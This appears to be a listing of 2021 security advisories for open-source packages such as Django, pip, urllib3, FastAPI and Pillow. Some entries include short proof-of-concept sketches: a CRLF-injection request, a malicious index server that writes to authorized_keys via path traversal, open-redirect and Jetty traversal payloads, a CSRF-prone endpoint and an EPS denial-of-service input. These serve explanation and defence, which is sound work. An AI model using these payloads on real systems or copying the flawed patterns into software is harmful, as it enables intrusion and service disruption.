Advisories

Jun 2021

Cross-site Scripting in Apache Airflow

The "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to XSS exploit. This issue affects Apache Airflow versions <1.10.15 in 1.x series and affects 2.0.0 and 2.0.1 and 2.x series. This is the same as CVE-2020-13944 & CVE-2020-17515 but the implemented fix did not fix the issue completely. Update to Airflow 1.10.15 or 2.0.2. Please also update your Python version to the latest available PATCH releases …

CRLF injection in urllib3

urllib3 before 1.25.9 allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR and LF control characters in the first argument of putrequest(). NOTE: this is similar to CVE-2020-26116.
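
To make the mechanism concrete, here is a hedged sketch (not taken from the advisory): if an application lets untrusted input choose the HTTP method, an affected urllib3 (before 1.25.9) passes the string straight through to putrequest(), so embedded CR/LF characters end up inside the raw request; patched releases reject such methods. The target URL below is only a placeholder.

    import urllib3

    # Hypothetical attacker-controlled "HTTP method" carrying CR/LF.
    attacker_method = "GET / HTTP/1.1\r\nX-Injected: smuggled\r\n\r\nGET"

    http = urllib3.PoolManager()
    try:
        # On affected versions the injected line is written into the request;
        # on 1.25.9+ the control characters cause the call to be rejected.
        http.request(attacker_method, "http://example.com/")
    except Exception as exc:
        print("request refused:", exc)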

Access of Resource Using Incompatible Type (Type Confusion)

The npm package striptags is an implementation of PHP's strip_tags in TypeScript. In striptags, a type-confusion vulnerability can cause striptags to concatenate unsanitized strings when an array-like object is passed in as the html parameter. This can be abused by an attacker who can control the shape of their input, e.g. if query parameters are passed directly into the function. This can lead to XSS.

Improper Authentication

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. A vulnerability related to firewall authentication is present in Symfony. When an application defines multiple firewalls, the token authenticated by one of the firewalls was available for all other firewalls. This could be abused when the application defines different providers for each part of the application; in such a situation, a user …

Cross-site Scripting in wagtail

When the {% include_block %} template tag is used to output the value of a plain-text StreamField block (CharBlock, TextBlock or a similar user-defined block derived from FieldBlock), and that block does not specify a template for rendering, the tag output is not properly escaped as HTML. This could allow users to insert arbitrary HTML or scripting. This vulnerability is only exploitable by users with the ability to author StreamField …

Uncontrolled Resource Consumption

JPA Server in HAPI FHIR before 5.4.0 allows a user to deny service (e.g., disable access to the database after the attack stops) via history requests. This occurs because of a SELECT COUNT statement that requires a full index scan, with an accompanying large amount of server resources if there are many simultaneous history requests.

Origin Validation Error

Apache Maven will follow repositories that are defined in a dependency’s Project Object Model (pom) which may be surprising to some users, resulting in potential risk if a malicious actor takes over that repository or is able to insert themselves into a position to pretend to be that repository. Maven is changing the default behavior in 3.8.1+ to no longer follow http (non-SSL) repository references by default. More details available …

Origin Validation Error

Apache Maven will follow repositories that are defined in a dependency’s Project Object Model (pom) which may be surprising to some users, resulting in potential risk if a malicious actor takes over that repository or is able to insert themselves into a position to pretend to be that repository. Maven is changing the default behavior in 3.8.1+ to no longer follow http (non-SSL) repository references by default. More details available …

Improper Verification of Cryptographic Signature

tEnvoy contains the PGP, NaCl, and PBKDF2 in node.js and the browser (hashing, random, encryption, decryption, signatures, conversions), used by TogaTech.org. The verifyWithMessage method of tEnvoyNaClSigningKey always returns true for any signature whose SHA-512 hash matches the SHA-512 hash of the message, even if the signature was invalid.
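
To illustrate the class of bug (tEnvoy itself is JavaScript, so this Python sketch is only an analogy, and broken_verify is a hypothetical name): a check that merely compares the hash embedded in a "signature" against the hash of the message accepts forgeries, whereas an actual signature verification with the public key does not.

    import hashlib
    from nacl.signing import SigningKey  # PyNaCl, used here only for the correct variant

    def broken_verify(message: bytes, sig_hash: bytes) -> bool:
        # Anti-pattern resembling the reported flaw: anyone who can hash the
        # message can forge a passing "signature".
        return hashlib.sha512(message).digest() == sig_hash

    def proper_verify(verify_key, message: bytes, signature: bytes) -> bool:
        # Correct approach: the public key actually checks the signature.
        try:
            verify_key.verify(message, signature)
            return True
        except Exception:
            return False

    sk = SigningKey.generate()
    msg = b"transfer 10 coins"
    forged = hashlib.sha512(msg).digest()             # built without any private key
    print(broken_verify(msg, forged))                 # True  -> forgery accepted
    print(proper_verify(sk.verify_key, msg, forged))  # False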

Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')

A Server-Side Template Injection was identified in Apache Syncope prior to 2.1.6 enabling attackers to inject arbitrary Java EL expressions, leading to an unauthenticated Remote Code Execution (RCE) vulnerability. Apache Syncope uses Java Bean Validation (JSR 380) custom constraint validators. When building custom constraint violation error messages, they support different types of interpolation, including Java EL expressions. Therefore, if an attacker can inject arbitrary data in the error message template …

Improper Authentication

The optional ActiveMQ LDAP login module can be configured to use anonymous access to the LDAP server. In this case, for Apache ActiveMQ Artemis prior to version 2.16.0 and Apache ActiveMQ prior to versions 5.16.1 and 5.15.14, the anonymous context is used to verify a valid user's password in error, resulting in no check on the password.

Improper Authentication

The optional ActiveMQ LDAP login module can be configured to use anonymous access to the LDAP server. In this case, for Apache ActiveMQ Artemis prior to version 2.16.0 and Apache ActiveMQ prior to versions 5.16.1 and 5.15.14, the anonymous context is used to verify a valid user's password in error, resulting in no check on the password.

Improper Authentication

Broken Authentication in Atlassian Connect Spring Boot (ACSB) from version 1.1.0 before 2.1.3 and from version 2.1.4 before 2.1.5: Atlassian Connect Spring Boot is a Java Spring Boot package for building Atlassian Connect apps. Authentication between Atlassian products and the Atlassian Connect Spring Boot app occurs with a server-to-server JWT or a context JWT. Atlassian Connect Spring Boot versions 1.1.0 before 2.1.3 and versions 2.1.4 before 2.1.5 erroneously accept context …

Improper Authentication

Apollos Apps is an open source platform for launching church-related apps. In Apollos Apps, new user registrations are able to access anyone's account by only knowing their basic profile information (name, birthday, gender, etc). This includes all app functionality within the app, as well as any authenticated links to Rock-based webpages (such as giving and events). A patch is available. As a workaround, one can patch one's server by overriding …

Cross-Site Request Forgery (CSRF)

In the default configuration, Apache MyFaces Core versions 2.2.0 to 2.2.13, 2.3.0 to 2.3.7, 2.3-next-M1 to 2.3-next-M4, and 3.0.0-RC1 use cryptographically weak implicit and explicit cross-site request forgery (CSRF) tokens. Due to that limitation, it is possible (although difficult) for an attacker to calculate a future CSRF token value and to use that value to trick a user into executing unwanted actions on an application.

Code Injection

Valine allows remote attackers to cause a denial of service (application outage) by supplying a ua (aka User-Agent) value that only specifies the product and version.

Open redirect in Flask-Unchained

This affects the package Flask-Unchained before 0.9.0. When using the _validate_redirect_url function, it is possible to bypass URL validation and redirect a user to an arbitrary URL by providing multiple backslashes such as \evil.com/path. This vulnerability is only exploitable if an alternative WSGI server other than Werkzeug is used, or the default behaviour of Werkzeug is modified using 'autocorrect_location_header=False'.
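
The backslash trick can be illustrated with a deliberately simplified, hypothetical validator (this is not Flask-Unchained's actual _validate_redirect_url): a check that only rejects scheme-relative // URLs and URLs with a netloc misses inputs with leading backslashes, which browsers normalize into an external address.

    from urllib.parse import urlparse

    def naive_is_safe_redirect(target: str) -> bool:
        # Hypothetical, flawed check: no netloc and no leading "//" is
        # treated as a local path.
        return not target.startswith("//") and not urlparse(target).netloc

    def stricter_is_safe_redirect(target: str) -> bool:
        # Treat backslashes like slashes before deciding, as browsers do.
        normalized = target.replace("\\", "/")
        return not normalized.startswith("//") and not urlparse(normalized).netloc

    payload = "\\\\evil.com/path"              # i.e. \\evil.com/path
    print(naive_is_safe_redirect(payload))     # True  -> open redirect
    print(stricter_is_safe_redirect(payload))  # False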

Insufficiently random values in Ansible

A flaw was found in the use of insufficiently random values in Ansible. Two random password lookups of the same length generate the same value, because the template caching action for the same file means no re-evaluation happens. The highest threat from this vulnerability would be that all passwords are exposed at once for the file. This flaw affects Ansible Engine versions before 2.9.6.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

A reflected Cross-Site Scripting (XSS) flaw was found in RESTEasy in all versions of RESTEasy up to 4.6.0.Final, where it did not properly handle URL encoding when calling @javax.ws.rs.PathParam without any @Produces MediaType. This flaw allows an attacker to launch a reflected XSS attack. The highest threat from this vulnerability is to data confidentiality and integrity.

Duplicate Advisory: Path Traversal in Zope

Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-5pr9-v234-jw36. This link is maintained to preserve external references. Original Description Zope is an open-source web application server. In Zope versions prior to 4.6 and 5.2, users can access untrusted modules indirectly through Python modules that are available for direct use. By default, only users with the Manager role can add or edit Zope Page Templates through …

Path Traversal

elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched. As a workaround, ensure the connector is not exposed without authentication.

Uncontrolled Resource Consumption

The actionpack ruby gem suffers from a possible denial of service vulnerability in the Token Authentication logic in Action Controller due to a too permissive regular expression. Impacted code uses authenticate_or_request_with_http_token or authenticate_with_http_token for request authentication.

Uncontrolled Resource Consumption

The actionpack ruby gem (a framework for handling and responding to web requests in Rails) suffers from a possible denial of service vulnerability in the Mime type parser of Action Dispatch. Carefully crafted Accept headers can cause the mime type parser in Action Dispatch to do catastrophic backtracking in the regular expression engine.

Uncontrolled Resource Consumption

There is a possible DoS vulnerability in the Token Authentication logic in Action Controller. Impacted code uses authenticate_or_request_with_http_token or authenticate_with_http_token for request authentication.

Uncontrolled Resource Consumption

There is a possible Denial of Service vulnerability in Action Dispatch. Carefully crafted Accept headers can cause the mime type parser in Action Dispatch to do catastrophic backtracking in the regular expression engine.

Cross-site Scripting

Cross-site scripting vulnerability in Drupal Core allows an attacker to leverage the way that HTML is rendered for affected forms in order to exploit the vulnerability.

Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)

An issue was discovered in Rclone before 1.53.3. Due to the use of a weak random number generator, the password generator has been producing weak passwords with much less entropy than advertised. The suggested passwords depend deterministically on the time the second rclone was started. This limits the entropy of the passwords enormously. These passwords are often used in the crypt backend for encryption of data. It would be possible …

Reachable Assertion

An assertion 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' fails at js-parser-expr.c:3230 in parser_parse_object_initializer in JerryScript.

Reachable Assertion

An assertion '(flags >> CBC_STACK_ADJUST_SHIFT) >= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE - (flags >> CBC_STACK_ADJUST_SHIFT)) <= context_p->stack_depth' fails in parser_emit_cbc_backward_branch in JerryScript.

Reachable Assertion

An assertion 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' fails in parser_parse_object_initializer in JerryScript.

Reachable Assertion

An assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' fails at js-parser-statm.c:733 in parser_parse_function_statement in JerryScript.

Path Traversal in Django

Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is …
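
The general pattern behind this class of issue, shown as a generic sketch rather than Django's actual admindocs code, is joining user input onto a base directory without confining the result; safe_resolve below is a hypothetical hardened variant.

    import os

    TEMPLATE_DIR = "/srv/app/templates"

    def unsafe_resolve(name: str) -> str:
        # Traversal-prone: "../" sequences in `name` can escape TEMPLATE_DIR.
        return os.path.normpath(os.path.join(TEMPLATE_DIR, name))

    def safe_resolve(name: str) -> str:
        # Hypothetical hardened variant: resolve, then verify containment.
        base = os.path.realpath(TEMPLATE_DIR)
        candidate = os.path.realpath(os.path.join(base, name))
        if os.path.commonpath([candidate, base]) != base:
            raise ValueError("path escapes the template directory")
        return candidate

    print(unsafe_resolve("../../etc/passwd"))  # /srv/etc/passwd - outside the base
    print(safe_resolve("admin/base.html"))     # stays inside TEMPLATE_DIR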

Duplicate Advisory: Reflected cross-site scripting issue in Datasette

Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-xw7c-jx9m-xh5g. This link is maintained to preserve external references. Original Description Datasette is an open source multi-tool for exploring and publishing data. The ?_trace=1 debugging feature in Datasette does not correctly escape generated HTML, resulting in a reflected cross-site scripting vulnerability. This vulnerability is particularly relevant if your Datasette installation includes authenticated features using plugins such as …

Duplicate Advisory: Path Traversal in Zope

Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-5pr9-v234-jw36. This link is maintained to preserve external references. Original Description Zope is an open-source web application server. This advisory extends the previous advisory at https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36 with additional cases of TAL expression traversal vulnerabilities. Most Python modules are not available for use in TAL expressions that you can add through-the-web, for example in Zope Page Templates. This …

Cross-site Scripting

A reflected Cross-Site Scripting (XSS) flaw was found in RESTEasy. It does not properly handle URL encoding when calling @javax.ws.rs.PathParam without any @Produces MediaType. This flaw allows an attacker to launch a reflected XSS attack. The highest threat from this vulnerability is to data confidentiality and integrity.

Cross-Site Request Forgery (CSRF) in FastAPI

FastAPI versions lower than 0.65.2 that used cookies for authentication in path operations that received JSON payloads sent by browsers were vulnerable to a Cross-Site Request Forgery (CSRF) attack. In versions lower than 0.65.2, FastAPI would try to read the request payload as JSON even if the content-type header sent was not set to application/json or a compatible JSON media type (e.g. application/geo+json). So, a request with a content type …
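
A minimal sketch of the vulnerable pattern, assuming an affected FastAPI (before 0.65.2) and cookie-only authentication; the route, model, and cookie names are illustrative. A cross-site HTML form posting a JSON-shaped body as text/plain would reach this handler with the victim's cookie attached, because affected versions parsed the body as JSON regardless of Content-Type.

    from typing import Optional

    from fastapi import Cookie, FastAPI
    from pydantic import BaseModel

    app = FastAPI()

    class Transfer(BaseModel):
        to_account: str
        amount: int

    @app.post("/transfer")
    def transfer(payload: Transfer, session: Optional[str] = Cookie(default=None)):
        # Authentication relies only on a cookie, which browsers attach
        # automatically, so a forged cross-site request is honored here on
        # affected versions even though its Content-Type is not JSON.
        if session is None:
            return {"error": "not authenticated"}
        return {"status": "ok", "to": payload.to_account, "amount": payload.amount}

On 0.65.2 and later, FastAPI only parses the body as JSON when the Content-Type declares a JSON-compatible media type, so the text/plain form post sketched above no longer reaches the handler with valid data.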

Time-of-check Time-of-use (TOCTOU) Race Condition

A flaw was found in Ansible if an Ansible user sets ANSIBLE_ASYNC_DIR to a subdirectory of a world-writable directory. When this occurs, there is a race condition on the managed machine. A malicious, non-privileged account on the remote machine can exploit the race condition to access the async result data. This flaw affects Ansible Tower and Ansible Automation Platform.

Path Traversal in pip

The pip package before 19.2 for Python allows Directory Traversal when a URL is given in an install command, because a Content-Disposition header can have ../ in a filename, as demonstrated by overwriting the /root/.ssh/authorized_keys file. This occurs in _download_http_url in _internal/download.py. A fix was committed in 6704f2ace.
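
For illustration, the server side of such an attack can be sketched as a hypothetical malicious index that answers a download request with a traversal-laden filename in the Content-Disposition header, which pip before 19.2 used when writing the file to disk.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    class MaliciousIndexHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            body = b"not really a package"
            self.send_response(200)
            # The traversal lives in the suggested filename, not in the URL.
            self.send_header(
                "Content-Disposition",
                'attachment; filename="../../../../root/.ssh/authorized_keys"',
            )
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    if __name__ == "__main__":
        # Illustration only: an affected "pip install <URL served by this handler>"
        # would honor the crafted filename when saving the download.
        HTTPServer(("127.0.0.1", 8000), MaliciousIndexHandler).serve_forever()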

Insufficient Session Expiration in OpenStack Keystone

An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. The list of roles provided for an OAuth1 access token is silently ignored. Thus, when an access token is used to request a keystone token, the keystone token contains every role assignment the creator had for the project. This results in the provided keystone token having more role assignments than the creator intended, possibly giving unintended escalated access.

Information Exposure

In Eclipse Jetty, it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory. For example, a request to /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.

Header injection possible in Django

In Django 2.2 before 2.2.22, 3.1 before 3.1.10, and 3.2 before 3.2.2 (with Python 3.9.5+), URLValidator does not prohibit newlines and tabs (unless the URLField form field is used). If an application uses values with newlines in an HTTP response, header injection can occur. Django itself is unaffected because HttpResponse prohibits newlines in HTTP headers.
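
A small sketch of the validator call, assuming an affected Django release running on Python 3.9.5+; the crafted value is illustrative. On patched releases the same call raises ValidationError.

    from django.conf import settings

    # Minimal standalone configuration so the validator can run outside a project.
    if not settings.configured:
        settings.configure()

    from django.core.exceptions import ValidationError
    from django.core.validators import URLValidator

    validate = URLValidator()
    crafted = "http://example.com/\r\nX-Injected:1"

    try:
        validate(crafted)
        print("accepted - newline not rejected (affected combination)")
    except ValidationError:
        print("rejected - fixed Django release")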

Cross-site Scripting

A cross-site scripting (XSS) vulnerability in the HTML Data Processor in CKEditor 4 allows remote attackers to inject executable JavaScript code through a crafted comment.

Cross-site Scripting

A cross-site scripting (XSS) vulnerability in the HTML Data Processor in CKEditor 4 allows remote attackers to inject executable JavaScript code through a crafted comment.

Uncontrolled Resource Consumption in Pillow

An issue was discovered in Pillow before 8.2.0. For EPS data, the readline implementation used in EPSImageFile has to deal with any combination of \r and \n as line endings. It used an accidentally quadratic method of accumulating lines while looking for a line ending. A malicious EPS file could use this to perform a DoS of Pillow in the open phase, before an image was accepted for opening.
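
A hedged sketch of the slow path, assuming an EPS-like payload built from a long run of bare carriage returns; the exact header handling is simplified, and the point is only how long the open call takes on an affected Pillow (before 8.2.0) compared with a patched one.

    import io
    import time

    from PIL import Image

    # Hypothetical crafted input: an EPS signature followed by many bare CRs,
    # so an affected reader keeps accumulating one enormous "line".
    payload = b"%!PS-Adobe-3.0 EPSF-3.0\n" + b"\r" * 200_000

    start = time.perf_counter()
    try:
        Image.open(io.BytesIO(payload))
    except Exception as exc:
        # The payload is not a valid image; only the parsing time matters here.
        print("open failed:", type(exc).__name__)
    print(f"elapsed: {time.perf_counter() - start:.2f}s")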

Uncontrolled Resource Consumption

A vulnerability was discovered in XNIO where a file descriptor leak is caused by growing numbers of NIO Selector file handles between garbage collection cycles. It may allow an attacker to cause a denial of service. It affects XNIO versions 3.6.0.Beta1 through 3.8.1.Final.

Privilege Context Switching Error

A flaw was found in WildFly. The EJBContext principal is not popped back after invoking another EJB using a different security domain. The highest threat from this vulnerability is to data confidentiality and integrity. Versions before WildFly 20.0.0.Final are affected.

Pillow denial of service

An issue was discovered in Pillow before 8.2.0. PSDImagePlugin.PsdImageFile lacked a sanity check on the number of input layers relative to the size of the data block. This could lead to a DoS on Image.open prior to Image.load.

Out-of-bounds Write

A heap-buffer overflow was found in the copyIntoFrameBuffer function of OpenEXR. An attacker could use this flaw to execute arbitrary code with the permissions of the user running the application compiled against OpenEXR.

Integer Underflow (Wrap or Wraparound)

An integer overflow leading to a heap-buffer overflow was found in the DwaCompressor of OpenEXR. An attacker could use this flaw to crash an application compiled with OpenEXR. This is a different flaw from CVE-2021-23215.

Insufficient Session Expiration

HashiCorp Vault and Vault Enterprise allowed the renewal of nearly-expired token leases and dynamic secret leases (specifically, those within 1 second of their maximum TTL), which caused them to be incorrectly treated as non-expiring during subsequent use. Fixed in 1.5.9, 1.6.5, and 1.7.2.

Incorrect Authorization

A vulnerability was found in OVN Kubernetes in versions up to and including 0.3.0 where the Egress Firewall does not reliably apply firewall rules when there are multiple DNS rules. It could potentially lead to loss of confidentiality, integrity, or availability of a service.

Improper Restriction of XML External Entity Reference

SilverStripe has an XXE Vulnerability in CSSContentParser. A developer utility meant for parsing HTML within unit tests can be vulnerable to XML External Entity (XXE) attacks. When this developer utility is misused for purposes involving external or user submitted data in custom project code, it can lead to vulnerabilities such as XSS on HTML output rendered through this custom code. This is now mitigated by disabling external entities during parsing.

Improper Preservation of Permissions

An incorrect access control flaw was found in the kiali-operator in versions before 1.33.0 and before 1.24.7. This flaw allows an attacker with a basic level of access to the cluster (to deploy a kiali operand) to use this vulnerability and deploy a given image to anywhere in the cluster, potentially gaining access to privileged service account tokens. The highest threat from this vulnerability is to data confidentiality and integrity …

Cross-site Scripting

In ICEcoder, a reflected XSS vulnerability was identified in the multipe-results.php page due to insufficient sanitization of the _GET['replace'] variable. As a result, arbitrary JavaScript code can get executed.

Reflected cross-site scripting issue in Datasette

The ?_trace=1 debugging feature in Datasette does not correctly escape generated HTML, resulting in a reflected cross-site scripting vulnerability. This vulnerability is particularly relevant if your Datasette installation includes authenticated features using plugins such as datasette-auth-passwords as an attacker could use the vulnerability to access protected data.

Improper Certificate Validation

WP-CLI is the command-line interface for WordPress. An improper error handling in HTTPS requests management in WP-CLI allows remote attackers able to intercept the communication to remotely disable the certificate verification on WP-CLI side, gaining full control over the communication content, including the ability to impersonate update servers and push malicious updates towards WordPress instances controlled by the vulnerable WP-CLI agent, or push malicious updates toward WP-CLI itself. The vulnerability …

Unrestricted Upload of File with Dangerous Type

Backstage is an open platform for building developer portals, and techdocs-common contains common functionalities for Backstage's TechDocs. In versions of @backstage/techdocs-common prior to 0.6.4, a malicious internal actor is able to upload documentation content with malicious scripts. These scripts would normally be sanitized by the TechDocs frontend, but by tricking a user to visit the content via the TechDocs API, the content sanitization will be bypassed. If the TechDocs API …

Unrestricted Upload of File with Dangerous Type

Backstage is an open platform for building developer portals. In versions of Backstage's Techdocs Plugin (@backstage/plugin-techdocs), a malicious internal actor can potentially upload documentation content with malicious scripts by embedding the script within an object element. This may give access to sensitive data when other users visit that same documentation page. The ability to upload malicious content may be limited by internal code review processes, unless the chosen TechDocs deployment …

Path Traversal in Django

In Django 2.2 before 2.2.21, 3.1 before 3.1.9, and 3.2 before 3.2.1, MultiPartParser, UploadedFile, and FieldFile allowed directory traversal via uploaded files with suitably crafted file names.

Improper Input Validation

A flaw was found in Hibernate Validator version 6.1.2.Final. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.

django-celery-results Stores Sensitive Information In Cleartext

django-celery-results prior to 2.4.0 stores task results in the database. Among the data it stores are the variables passed into the tasks. The variables may contain sensitive cleartext information that does not belong unencrypted in the database. In version 2.4.0 this is no longer the default behaviour but can be re-enabled with the result_extended flag in which case care should be taken to ensure any sensitive variables are scrubbed - …

Cross-site Scripting

auth0-lock is Auth0's signin solution. Versions of auth0-lock up to and including 11.30.0 are vulnerable to reflected XSS. An attacker can execute arbitrary code when either the library's flashMessage feature is used and user input or data from URL parameters is incorporated into the flashMessage, or the library's languageDictionary feature is used and user input or data from URL parameters is incorporated into the languageDictionary.

Path Traversal

Backstage is an open platform for building developer portals, and techdocs-common contains common functionalities for Backstage's TechDocs. In @backstage/techdocs-common, a malicious actor could read sensitive files from the environment where TechDocs documentation is built and published by setting a particular path for docs_dir in mkdocs.yml.

Prototype Pollution

The merge-deep library for Node.js can be tricked into overwriting properties of Object.prototype or adding new properties to it. These properties are then inherited by every object in the program, thus facilitating prototype-pollution attacks against applications using this library.

Out-of-bounds Write

There's a flaw in lz4. An attacker who submits a crafted file to an application linked with lz4 may be able to trigger an integer overflow, leading to calling of memmove() on a negative size argument, causing an out-of-bounds write and/or a crash. The greatest impact of this flaw is to availability, with some potential impact to confidentiality and integrity as well.

Use After Free

There's a flaw in libxml2's xmllint. An attacker who is able to submit a crafted file to be processed by xmllint could trigger a use-after-free. The greatest impact of this flaw is to confidentiality, integrity, and availability.

Use After Free

There's a flaw in libxml2's xmllint. An attacker who is able to submit a crafted file to be processed by xmllint could trigger a use-after-free. The greatest impact of this flaw is to confidentiality, integrity, and availability.

Permissions bypass in KubeVirt

A flaw was found in the KubeVirt main virt-handler versions before 0.26.0 regarding the access permissions of virt-handler. An attacker with access to create VMs could attach any secret within their namespace, allowing them to read the contents of that secret.

Out-of-bounds Write

All versions of Libjpeg-turbo have a stack-based buffer overflow in the "transform" component. A remote attacker can send a malformed JPEG file to the service and cause arbitrary code execution or denial of service of the target service.

Insertion of Sensitive Information into Log File in ansible

A flaw was found in an Ansible module where credentials are disclosed in the console log by default and are not protected by the security feature when using the bitbucket_pipeline_variable module. This flaw allows an attacker to steal bitbucket_pipeline credentials. The highest threat from this vulnerability is to confidentiality.

Insertion of Sensitive Information into Log File in ansible

A flaw was found in Ansible. Credentials, such as secrets, are disclosed in the console log by default and are not protected by the no_log feature when using those modules. An attacker can take advantage of this information to steal those credentials. The highest threat from this vulnerability is to data confidentiality.

Incorrect Authorization

A flaw was found in the BPMN editor. Any authenticated user from any project can see the name of Ruleflow Groups from other projects, despite the user not having access to those projects. The highest threat from this vulnerability is to confidentiality.

Improper Verification of Cryptographic Signature in aws-encryption-sdk-javascript

This ESDK supports a streaming mode where callers may stream the plaintext of signed messages before the ECDSA signature is validated. In addition to these signatures, the ESDK uses AES-GCM encryption and all plaintext is verified before being released to a caller. There is no impact on the integrity of the ciphertext or decrypted plaintext; however, some callers may rely on the ECDSA signature for non-repudiation. Without validating the …

Improper Restriction of Communication Channel to Intended Endpoints

Singularity is an open source container platform. In versions 3.7.2 and 3.7.3, due to incorrect use of a default URL, singularity action commands (run/shell/exec) specifying a container using a library:// URI will always attempt to retrieve the container from the default remote endpoint (cloud.sylabs.io) rather than the configured remote endpoint. An attacker may be able to push a malicious container to the default remote endpoint with a URI that is …

Deserialization of Untrusted Data

Each Apache Dubbo server will set a serialization id to tell the clients which serialization protocol it is working on. But for Dubbo, an attacker can choose which serialization id the Provider will use by tampering with the byte preamble flags, i.e., not following the server's instruction. This means that if a weak deserializer such as Kryo or FST is somehow in code scope (e.g. if Kryo is somehow …

Deserialization of Untrusted Data

Apache Dubbo by default supports generic calls to arbitrary methods exposed by provider interfaces. These invocations are handled by the GenericFilter which will find the service and method specified in the first arguments of the invocation and use the Java Reflection API to make the final call. The signature for the $invoke or $invokeAsync methods is Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object; where the first argument is the name of the method to invoke, the …

Code Injection

Apache Dubbo supports Script routing which will enable a customer to route the request to the right server. These rules are used by the customers when making a request in order to find the right endpoint. When parsing these rules, Dubbo customers use ScriptEngine and run the rule provided by the script which by default may enable executing arbitrary code.

Authentication Bypass by Spoofing

An authentication bypass vulnerability was found in Kiali in versions before 1.31.0 when the authentication strategy OpenID is used. When RBAC is enabled, Kiali assumes that some of the token validation is handled by the underlying cluster. When OpenID implicit flow is used with RBAC turned off, this token validation doesn't occur, and this allows a malicious user to bypass the authentication.

May 2021

Argument Injection or Modification

An argument injection vulnerability in the Dragonfly gem for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.

Out-of-bounds Write

A flaw was found in the ZeroMQ server. This flaw allows a malicious client to cause a stack buffer overflow on the server by sending crafted topic subscription requests and then unsubscribing. The highest threat from this vulnerability is to confidentiality and integrity, as well as system availability.

Improper Neutralization of Special Elements used in a Command ('Command Injection') in @floffah/build

Impact: If you are using the esbuild target or command, you are at risk of code/option injection. Attackers can use the command line option to maliciously change your settings in order to damage your project. Patches: The problem has been patched in v1.0.0, as it uses a proper method to pass configs to esbuild/estrella. Workarounds: There is no workaround; you should update as soon as possible. Notes: This notice is mainly just …

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Http4s is a Scala interface for HTTP services. StaticFile.fromUrl can leak the presence of a directory on a server when the URL scheme is not file://, and the URL points to a fetchable resource under its scheme and authority. The function returns F[None], indicating no resource, if url.getFile is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL …

Improper Input Validation

A flaw was found in Keycloak. A self-stored XSS attack vector escalating to a complete account takeover is possible due to user-supplied data fields not being properly encoded and JavaScript code being used to process the data. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Use of Incorrectly-Resolved Name or Reference

runc through 1.0.0-rc9 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. (This vulnerability does not affect Docker due to an implementation detail that happens to block the attack.)

URL Redirection to Untrusted Site (Open Redirect)

Tenancy multi-tenant is an open source multi-domain controller for the Laravel web framework. In some situations, it is possible to have open redirects where users can be redirected from your site to any other site using a specially crafted URL. This is only the case for installations where the default Hostname Identification is used and the environment uses tenants that have force_https set to true (the default is false).

Reliance on Reverse DNS Resolution for a Security-Critical Action

In Weave Net before version 2.6.3, an attacker able to run a process as root in a container is able to respond to DNS requests from the host and thereby insert themselves as a fake service. In a cluster with an IPv4 internal network, if IPv6 is not totally disabled on the host (via ipv6.disable=1 on the kernel cmdline), it will be either unconfigured or configured on some interfaces, but …

Path Traversal

runc allows a Container Filesystem Breakout via Directory Traversal. To exploit the vulnerability, an attacker must be able to create multiple containers with a fairly specific mount configuration. The problem occurs via a symlink-exchange attack that relies on a race condition.

Path Traversal

Http4s is a Scala interface for HTTP services. StaticFile.fromUrl can leak the presence of a directory on a server when the URL scheme is not file://, and the URL points to a fetchable resource under its scheme and authority. The function returns F[None], indicating no resource, if url.getFile is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL …

Out-of-bounds Write

Tendermint before versions 0.33.3, 0.32.10, and 0.31.12 has a denial-of-service vulnerability. Tendermint does not limit the number of P2P connection requests. For each p2p connection, it allocates XXX bytes. Even though this memory is garbage collected once the connection is terminated (due to duplicate IP or reaching a maximum number of inbound peers), temporary memory spikes can lead to OOM (Out-Of-Memory) exceptions. Additionally, Tendermint does not reclaim activeID of a …

Out-of-bounds Write

